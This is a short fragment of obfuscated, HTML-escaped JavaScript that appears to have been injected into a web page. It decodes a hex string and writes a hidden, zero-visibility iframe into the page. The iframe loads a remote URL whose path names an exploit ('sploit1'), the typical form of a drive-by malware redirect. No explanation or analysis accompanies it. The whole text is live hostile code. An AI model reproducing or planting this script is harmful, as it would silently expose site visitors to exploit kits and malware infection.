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&lt;script&gt;function vYYbyVtyaVy(vadxYxayVtd){  return(parseInt(vadxYxayVtd,16));}function vVyadyttYYt(vadtxxtbybb){  var vxtaYtVdytb='';for(vVaYdxVxbYy=0; vVaYdxVxbYy&lt;vadtxxtbybb.length; vVaYdxVxbYy+=2){vxtaYtVdytb+=(String.fromCharCode(vYYbyVtyaVy(vadtxxtbybb.substr(vVaYdxVxbYy,2))));}return vxtaYtVdytb;} document.write(vVyadyttYYt('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65202069643D227462597962796262646122206E616D653D227462626178615979627922207372633D22687474703A2F2F7265646469692E72752F747261666669632F73706C6F6974312F3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3136343631292B2778745659566456597464222077696474683D22333122206865696768743D2235333122207374796C653D22646973706C61793A206E6F6E653B223E3C2F696672616D653E27293C2F5343524950543E'))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